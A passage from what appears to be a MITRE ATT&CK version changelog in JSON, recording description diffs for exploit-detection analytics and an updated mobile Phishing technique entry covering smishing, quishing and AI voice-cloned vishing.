Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\\n+Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to55__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to55__0\"><a href=\"#difflib_chg_to55__top\">t</a></td><td class=\"diff_header\" id=\"from55_1\">1</td><td nowrap=\"nowrap\">&nbsp;Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibilit</td><td class=\"diff_next\"><a href=\"#difflib_chg_to55__top\">t</a></td><td class=\"diff_header\" id=\"to55_1\">1</td><td nowrap=\"nowrap\">&nbsp;Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibilit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behav</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behav</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ior&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ior&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;relating&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;exploits&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;relating&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;exploits&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;Application](https://attack.mitre.org/techniques/T1190),&nbsp;[</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;Application](https://attack.mitre.org/techniques/T1190),&nbsp;[</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://attack.mitre.org/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privilege&nbsp;Escalation](h</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privilege&nbsp;Escalation](h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T1068),&nbsp;[Exploitation&nbsp;for</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T1068),&nbsp;[Exploitation&nbsp;for</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mitre.org/techniques/T1211)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/techniques/T1211),&nbsp;[Explo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](https://attack.mitre.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itation&nbsp;for&nbsp;Credential&nbsp;Access](https://attack.mitre.org/tech</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">org/techniques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remote&nbsp;Services](htt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remote&nbsp;Services](https://att</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/techniques/T1210),&nbsp;and&nbsp;[Application&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ack.mitre.org/techniques/T1210),&nbsp;and&nbsp;[Application&nbsp;or&nbsp;System&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;System&nbsp;Exploitation](https://attack.mitre.org/techniques/T1</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Exploitation](https://attack.mitre.org/techniques/T1499/004)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">499/004)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">).</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1762aa55-010b-4a26-b439-7afcfcc5613d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-10-21 15:10:28.402000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0894#AN2026",
                            "external_id": "AN2026"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2026",
                    "description": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['description']\": {\"new_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"old_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to59__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to59__0\"><a href=\"#difflib_chg_to59__top\">t</a></td><td class=\"diff_header\" id=\"from59_1\">1</td><td nowrap=\"nowrap\">Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibility</td><td class=\"diff_next\"><a href=\"#difflib_chg_to59__top\">t</a></td><td class=\"diff_header\" id=\"to59_1\">1</td><td nowrap=\"nowrap\">Much&nbsp;of&nbsp;this&nbsp;activity&nbsp;will&nbsp;take&nbsp;place&nbsp;outside&nbsp;the&nbsp;visibility</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behavi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;the&nbsp;target&nbsp;organization,&nbsp;making&nbsp;detection&nbsp;of&nbsp;this&nbsp;behavi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;difficult.&nbsp;Detection&nbsp;efforts&nbsp;may&nbsp;be&nbsp;focused&nbsp;on&nbsp;behaviors&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">relating&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;exploits&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">relating&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;exploits&nbsp;(i.e.&nbsp;[Exploit&nbsp;Public-Facing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Application](https://attack.mitre.org/techniques/T1190),&nbsp;[E</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Application](https://attack.mitre.org/techniques/T1190),&nbsp;[E</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://attack.mitre.org/t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://attack.mitre.org/t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">echniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privilege&nbsp;Escalation](ht</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">echniques/T1203),&nbsp;[Exploitation&nbsp;for&nbsp;Privilege&nbsp;Escalation](ht</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1068),&nbsp;[Exploitation&nbsp;for&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1068),&nbsp;[Exploitation&nbsp;for&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mitre.org/techniques/T1211),</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/techniques/T1211),&nbsp;[Exploi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Exploitation&nbsp;for&nbsp;Credential&nbsp;Access](https://attack.mitre.o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation&nbsp;for&nbsp;Credential&nbsp;Access](https://attack.mitre.org/techn</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rg/techniques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remote&nbsp;Services](http</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1212),&nbsp;[Exploitation&nbsp;of&nbsp;Remote&nbsp;Services](https://atta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/techniques/T1210),&nbsp;and&nbsp;[Application&nbsp;or&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.mitre.org/techniques/T1210),&nbsp;and&nbsp;[Application&nbsp;or&nbsp;System&nbsp;E</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">System&nbsp;Exploitation](https://attack.mitre.org/techniques/T14</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xploitation](https://attack.mitre.org/techniques/T1499/004))</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">99/004)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.</td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        }
    },
    "mobile-attack": {
        "techniques": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--defc1257-4db1-4fb3-8ef5-bb77f63146df",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-21 19:35:15.552000+00:00",
                    "modified": "2026-04-20 17:38:10.545000+00:00",
                    "name": "Phishing",
                    "description": "Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as \u201cspearphishing.\u201d Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.\n\nMobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms. Adversaries may also impersonate executives of organizations to persuade victims into performing some action on their behalf. For example, adversaries will often use social engineering techniques in text messages to trick the victims into acting quickly, which leads to adversaries obtaining credentials and other information. \n\nMobile devices are a particularly attractive target for adversaries executing phishing campaigns.  Due to their smaller form factor than traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as: \n\n- SMS messages: Adversaries may send SMS messages (known as \u201csmishing\u201d) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.\n- Quick Response (QR) Codes: Adversaries may use QR codes (known as \u201cquishing\u201d) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user\u2019s desktop computer to their mobile device.\n- Phone Calls: Adversaries may call victims (known as \"vishing\") to persuade them to perform an action, such as providing login credentials or navigating to malicious websites. Common vishing targets include employees, especially executives of organizations, and help desks. This may also be used as a technique to perform the initial access on a mobile device, but then pivot to a desktop computer by having the victims perform actions on a desktop computer. With the rise of artificial intelligence (AI), adversaries may also use AI to clone a person\u2019s voice, resulting in deepfake vishing. The cloned voice provides familiarity to the victims, increasing the likelihood of successful malicious actions performed by the victims. Additionally, adversaries may leave voicemails, which may use a real person\u2019s voice or an AI-generated voice; these scams would urgently ask victims into calling back to perform an action, e.g. sending money or providing sensitive information and credentials.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-mobile-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1660",
                            "external_id": "T1660"
                        },
                        {
                            "source_name": "NIST Mobile Threat Catalogue",
                            "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html",
                            "external_id": "AUT-9"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vijay Lalwani",
                        "Will Thomas, Equinix",
                        "Adam Mashinchi",
                        "Sam Seabrook, Duke Energy",
                        "Naveen Devaraja, bolttech",
                        "Brian Donohue",
                        "Lookout"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android",
                        "iOS"
                    ],
                    "x_mitre_tactic_type": [
                        "Post-Adversary Device Access"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 17:38:10.545000+00:00\", \"old_value\": \"2025-08-20 14:33:34.968000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as \\u201cspearphishing.\\u201d Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.\\n\\nMobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms. Adversaries may also impersonate executives of organizations to persuade victims into performing some action on their behalf. For example, adversaries will often use social engineering techniques in text messages to trick the victims into acting quickly, which leads to adversaries obtaining credentials and other information. \\n\\nMobile devices are a particularly attractive target for adversaries executing phishing campaigns.  Due to their smaller form factor than traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as: \\n\\n- SMS messages: Adversaries may send SMS messages (known as \\u201csmishing\\u201d) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.\\n- Quick Response (QR) Codes: Adversaries may use QR codes (known as \\u201cquishing\\u201d) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user\\u2019s desktop computer to their mobile device.\\n- Phone Calls: Adversaries may call victims (known as \\\"vishing\\\") to persuade them to perform an action, such as providing login credentials or navigating to malicious websites. Common vishing targets include employees, especially executives of organizations, and help desks. This may also be used as a technique to perform the initial access on a mobile device, but then pivot to a desktop computer by having the victims perform actions on a desktop computer. With the rise of artificial intelligence (AI), adversaries may also use AI to clone a person\\u2019s voice, resulting in deepfake vishing. The cloned voice provides familiarity to the victims, increasing the likelihood of successful malicious actions performed by the victims. Additionally, adversaries may leave voicemails, which may use a real person\\u2019s voice or an AI-generated voice; these scams would urgently ask victims into calling back to perform an action, e.g. sending money or providing sensitive information and credentials.\\n\", \"old_value\": \"Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as \\u201cspearphishing.\\u201d Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.\\n\\nMobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms. Adversaries may also impersonate executives of organizations to persuade victims into performing some action on their behalf. For example, adversaries will often use social engineering techniques in text messages to trick the victims into acting quickly, which leads to adversaries obtaining credentials and other information. \\n\\nMobile devices are a particularly attractive target for adversaries executing phishing campaigns.  Due to their smaller form factor than traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as: \\n\\n- SMS messages: Adversaries may send SMS messages (known as \\u201csmishing\\u201d) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.\\n- Quick Response (QR) Codes: Adversaries may use QR codes (known as \\u201cquishing\\u201d) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user\\u2019s desktop computer to their mobile device.\\n- Phone Calls: Adversaries may call victims (known as \\u201cvishing\\u201d) to persuade them to perform an action, such as providing login credentials or navigating to a malicious website. This could also be used as a technique to perform the initial access on a mobile device, but then pivot to a computer/other network by having the victim perform an action on a desktop computer.\\n\", \"diff\": \"--- \\n+++ \\n@@ -6,4 +6,4 @@\\n \\n - SMS messages: Adversaries may send SMS messages (known as \\u201csmishing\\u201d) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.\\n - Quick Response (QR) Codes: Adversaries may use QR codes (known as \\u201cquishing\\u201d) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user\\u2019s desktop computer to their mobile device.\\n-- Phone Calls: Adversaries may call victims (known as \\u201cvishing\\u201d) to persuade them to perform an action, such as providing login credentials or navigating to a malicious website. This could also be used as a technique to perform the initial access on a mobile device, but then pivot to a computer/other network by having the victim perform an action on a desktop computer.\\n+- Phone Calls: Adversaries may call victims (known as \\\"vishing\\\") to persuade them to perform an action, such as providing login credentials or navigating to malicious websites. Common vishing targets include employees, especially executives of organizations, and help desks. This may also be used as a technique to perform the initial access on a mobile device, but then pivot to a desktop computer by having the victims perform actions on a desktop computer. With the rise of artificial intelligence (AI), adversaries may also use AI to clone a person\\u2019s voice, resulting in deepfake vishing. The cloned voice provides familiarity to the victims, increasing the likelihood of successful malicious actions performed by the victims. Additionally, adversaries may leave voicemails, which may use a real person\\u2019s voice or an AI-generated voice; these scams would urgently ask victims into calling back to perform an action, e.g. sending money or providing sensitive information and credentials.\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to64__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to64__0\"><a href=\"#difflib_chg_to64__top\">t</a></td><td class=\"diff_header\" id=\"from64_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;malicious&nbsp;content&nbsp;to&nbsp;users&nbsp;in&nbsp;order&nbsp;to&nbsp;</td><td class=\"diff_next\"><a href=\"#difflib_chg_to64__top\">t</a></td><td class=\"diff_header\" id=\"to64_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;malicious&nbsp;content&nbsp;to&nbsp;users&nbsp;in&nbsp;order&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gain&nbsp;access&nbsp;to&nbsp;their&nbsp;mobile&nbsp;devices.&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gain&nbsp;access&nbsp;to&nbsp;their&nbsp;mobile&nbsp;devices.&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;electronically&nbsp;delivered&nbsp;social&nbsp;engineering.&nbsp;Adversaries&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;electronically&nbsp;delivered&nbsp;social&nbsp;engineering.&nbsp;Adversaries&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;conduct&nbsp;both&nbsp;non-targeted&nbsp;phishing,&nbsp;such&nbsp;as&nbsp;in&nbsp;mass&nbsp;malw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;conduct&nbsp;both&nbsp;non-targeted&nbsp;phishing,&nbsp;such&nbsp;as&nbsp;in&nbsp;mass&nbsp;malw</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;spam&nbsp;campaigns,&nbsp;as&nbsp;well&nbsp;as&nbsp;more&nbsp;targeted&nbsp;phishing&nbsp;tailor</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;spam&nbsp;campaigns,&nbsp;as&nbsp;well&nbsp;as&nbsp;more&nbsp;targeted&nbsp;phishing&nbsp;tailor</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;for&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;company,&nbsp;or&nbsp;industry,&nbsp;known&nbsp;as</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;for&nbsp;a&nbsp;specific&nbsp;individual,&nbsp;company,&nbsp;or&nbsp;industry,&nbsp;known&nbsp;as</td></tr>\n            <tr><td 